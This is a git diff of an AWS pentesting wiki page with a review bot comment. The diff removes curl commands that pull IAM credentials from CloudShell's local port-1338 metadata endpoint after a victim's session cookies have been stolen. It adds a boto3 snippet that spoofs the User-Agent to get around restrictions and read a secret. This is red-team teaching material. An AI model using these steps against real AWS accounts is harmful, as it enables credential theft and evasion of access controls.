diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md index 01db4ad416..7a03ece8eb 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md 
@@ -101,16 +101,24 @@ aws-vault login jonsmith # Open a browser logged as jonsmith You can also use **aws-vault** to obtain an **browser console session** {% endhint %} -#### From Console to IAM Creds +### **Bypass User-Agent restrictions from Python** -[**Originally discovered in this post**](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/), If you manage to compromise some access to a web console (maybe you stole cookies and could't access the .aws folder), you can obtain some IAM token credentials for that user through **CloudShell**. - -CloudShell exposes IAM credentials via an **undocumented endpoint on port 1338**. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials. +If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: +{% code overflow="wrap" %} ```bash -TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60") -curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN" +# Shared by ex16x41 +# Create a client +session = boto3.Session(profile_name="lab6") +client = session.client("secretsmanager", region_name="us-east-1") + +# Change user agent of the client +client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) ) + +# Perform the action +response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` +{% endcode %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\
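Review bot: the added code block under "Bypass User-Agent restrictions from Python" is still fenced as `bash`, carried over from the removed curl commands, but its content is Python. Tag the fence `python` and add `import boto3` at the top, since the snippet calls `boto3.Session` without importing it. The profile name `lab6` and the secret id `flag_secret` look specific to one lab; placeholder values with a short comment would make the snippet easier to reuse in documentation. The hunk also deletes the "From Console to IAM Creds" section outright and changes the heading from `####` to a bolded `###`. If the CloudShell content has moved to another page, a link here would keep the reference, and it is worth checking that the new heading level matches the sections around it.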